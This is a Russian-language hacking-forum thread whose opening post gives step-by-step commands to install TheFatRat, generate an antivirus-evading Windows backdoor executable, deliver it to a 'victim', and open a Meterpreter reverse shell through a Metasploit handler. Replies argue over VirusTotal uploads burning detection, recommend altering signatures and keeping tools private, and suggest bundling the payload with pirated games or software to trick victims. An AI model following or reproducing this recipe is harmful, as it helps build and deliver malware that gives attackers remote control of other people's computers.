Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 

Сергей Попов

Кодебай
30.12.2015
4 718
6 707
BIT
368
На многих форумах за такое пермоментный бан выписывают, без сю-сюканья.
Информация, в нашем случае статья, размещена для публичного обсуждения. Статья доступна как зарегистрированным участникам форума, так и гостям ... Обвинения в "сливе" информации на VT в данном случае неуместны.
над такими моментами должна думать администрация я считаю
Предложения по работе сайта можно оставить в этом разделе.
Cделать раздел закрытым > Этичный хакинг и тестирование на проникновение пускать людей кто в теме у кого прокачены скилы.
Прочтите пожалуйста еще раз название раздела и Вы наверняка поймете, что предложение сделать его закрытым, выглядит несколько странным. А если Вы обратите внимание на название сайта, то возможно, сделаете более глубокие выводы:
codebynet.png
 

z3RoTooL

Grey Team
28.02.2016
803
697
BIT
10
у нас тут не хак-вечеринка, раздел посвящён пентесту, никакого смысла его закрывать нет!
 
  • Нравится
Реакции: SergaevOleg
P

pahahak

Прочтите пожалуйста еще раз название раздела
Так и назовите массовый слив на VT школьниками и ламерами. У меня есть чем поделиться, смотрю вот на вашу политику и аудиторию, нет желания, так как всё актуальное по сей день , на протяжении почти года - так как инфа не подвергалась вбросу вот так как у вас, она есть в свободном доступе на том же джиде, НО туда не каждый школьник лезит им проще тут всё брать и сливать на VT - я противник этого. Смысл чем то делиться? Чтоб школьники и ламеры ушатали за один день годноту которая почти год актуальна? Смысла нет что-то говорить видимо. Я на вашем форуме не приживусь, спасибо за ответы, всего доброго.
 
  • Нравится
Реакции: Knife, Lisenok и Vander

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Так и назовите массовый слив на VT школьниками и ламерами. У меня есть чем поделиться, смотрю вот на вашу политику и аудиторию, нет желания, так как всё актуальное по сей день , на протяжении почти года - так как инфа не подвергалась вбросу вот так как у вас, она есть в свободном доступе на том же джиде, НО туда не каждый школьник лезит им проще тут всё брать и сливать на VT - я противник этого. Смысл чем то делиться? Чтоб школьники и ламеры ушатали за один день годноту которая почти год актуальна? Смысла нет что-то говорить видимо. Я на вашем форуме не приживусь, спасибо за ответы, всего доброго.
Еще один человек за закрытый раздел)
Я тоже плюсую за создадиня закрытого раздела.С чоткими правилами и попасть туда по рекомендацием администрации или членов команды форума.
Предлагаю сделать голосования на форуме об введении закрытого раздела.
 
P

pahahak

уже детектируется Win32/Powerless
С чего бы это? Что тут удивительного? Настоятельно рекомендую, не выкладывайте годноту здесь - её сольют школьники на VT. Кто понимает о какой солидарности я говорю - поддержите. Потом удивляются почему новичков и школьников не любят на подобных ресурсах. Такие вещи в свободном доступе на русскоязычную аудиторию нельзя выкладывать ушатают. Да о чём я вообще, сам ТС на вирус тотал всё сливал интересно на протяжении какого времени. У каждого второго группа ВК аудиторию так нагоняют походу на ФОРУМ, так здесь никого кроме школьников которые на ВТ сливают наработки и не останется. В субботу выложил уже не актуально - что тестировать? Уже не актуальный эксплоит? да? Что тут предлагать вообще? Я написал что нужно сделать, хотя бы элементарно доносить до всех или сделать банер со списком куда можно загружать а куда нет - и наказание. Если вам плевать на эту солидарность - это уже отдельная история.
 
Последнее редактирование модератором:
  • Нравится
Реакции: Web_start

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Всем привет, народ вот почитал эту ветку..и хочу свои соображения высказать по данному поводу...Если создать закрытый раздел это уменьшит посещения данного сайта, что скажется на его продвижении...с другой стороны конечно отвалятся те кто хочет быстрого хака не владея азами и не желает постигать азы( что иногда немного напрягает),все это решать администрации.Насчет вирустотала, не обязательно загружать файл целиком ,достаточно загрузить его хэш что бы проверить, так же существует специальный софт который может генерировать тысячи комбинаций шелкода, OWASP ZSC одна из таких программ..и таких программ сотни..
 
Последнее редактирование:
  • Нравится
Реакции: DusikOff и hdmoor
P

pahahak

Всем привет, народ вот почитал эту ветку..и хочу свои соображения высказать по данному поводу...Если создать закрытый раздел это уменьшит посещения данного сайта, что скажется на его продвижении...с другой стороны конечно отвалятся те кто хочет быстрого хака не владея азами и не желает постигать азы( что иногда немного напрягает),все это решать администрации.Насчет вирустотала, не обязательно загружать файл целиком ,достаточно загрузить его хэш что бы проверить, так же существует специальный софт который может генерировать тысячи комбинаций шелкода, OWASP ZSC одна из таких программ..и таких программ сотни..
Согласен. Посещение сайта рухнет - фест хацкеров и т.д. персонажей, я как понимаю Администрации полезен именно такой контингент на форуме, ИБО те кому есть чем поделиться они пройдут мимо. Всё предельно просто.
 

Сергей Попов

Кодебай
30.12.2015
4 718
6 707
BIT
368
Я написал что нужно сделать, хотя бы элементарно доносить до всех или сделать банер со списком куда можно загружать а куда нет - и наказание. Если вам плевать на эту солидарность - это уже отдельная история.
Не плевать. Решим этот вопрос. По крайней мере приложим усилия ...
 
H

hdmoor

also good
1.
2.
 
I

IronBird

Не плевать. Решим этот вопрос. По крайней мере приложим усилия ...
Скажу от лица, скажем так ламера, мне было бы чисто для себя интересно почитать какой-нибудь перечень азов что стоит делать, а чего не стоит делать.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Скажу от лица, скажем так ламера, мне было бы чисто для себя интересно почитать какой-нибудь перечень азов что стоит делать, а чего не стоит делать.
Заведи себе друзей ,которые секут в этом.)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Так и назовите массовый слив на VT школьниками и ламерами. У меня есть чем поделиться, смотрю вот на вашу политику и аудиторию, нет желания, так как всё актуальное по сей день , на протяжении почти года - так как инфа не подвергалась вбросу вот так как у вас, она есть в свободном доступе на том же джиде, НО туда не каждый школьник лезит им проще тут всё брать и сливать на VT - я противник этого. Смысл чем то делиться? Чтоб школьники и ламеры ушатали за один день годноту которая почти год актуальна? Смысла нет что-то говорить видимо. Я на вашем форуме не приживусь, спасибо за ответы, всего доброго.
Я тебе скажу так,любая публичная софтина или чей то скрип рано или позно попадает на вирустотал, и совсем не обезательно это будет по вине форумчанина этого форума,существуют очень много ресурсов где тот же FatRat упоминается. Посему все что не приват - попадает на вирустотал и по этому нужно понимать как работает даный скрипт или софтина - менять его сигнатуры,держать его в привате и тогда вы никогда не будете парится о масовом сливе школьниками.
А школьники они всегда были,есть и будут.Их не победить. И не нужно обвинять этот форум как место их скопления - они везде,и всегда найдеться тот который скачает zeroday exploit и запустит у себя с правами администратора не задумываясь что он себе сносит всю систему...
Посему я призываю всех быть более лояльным друг к другу.
Критика - это хорошо ,это путь к совершентсву.
Г****критика - это не хорошо, это порождения оскорбительного оффтопа)
 
Последнее редактирование модератором:
  • Нравится
Реакции: arm_n, hdmoor и kot-gor
H

hdmoor

03623c319793.png


уже запалилась тема слегка...
...вас не смущает что этот экзешник весит 3,5 мб? такой сарай жертве всуропить надо изловчиться...
...там ещё есть файл Powerfull-fud.exe который палится наглухо АВ, не подскажите други зачем это он там?
 
Последнее редактирование модератором:
F

fear

...вас не смущает что этот экзешник весит 3,5 мб? такой сарай жертве всуропить надо изловчиться...
Если не грузишь через какой то сплойт пак то вполне нормально, что такое нынче 3,5 мб, мелочь...

А если впаривать вручную то даже наоборот, больше вопросов вызывает почему такой маленький... Вон на торрентах бывают склеивают с играми, фотошопами и норм.
 
  • Нравится
Реакции: hdmoor
H

hdmoor

...там, так то, если по-внимательней инструмент обозреть, есть примочки по-взрослее...
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!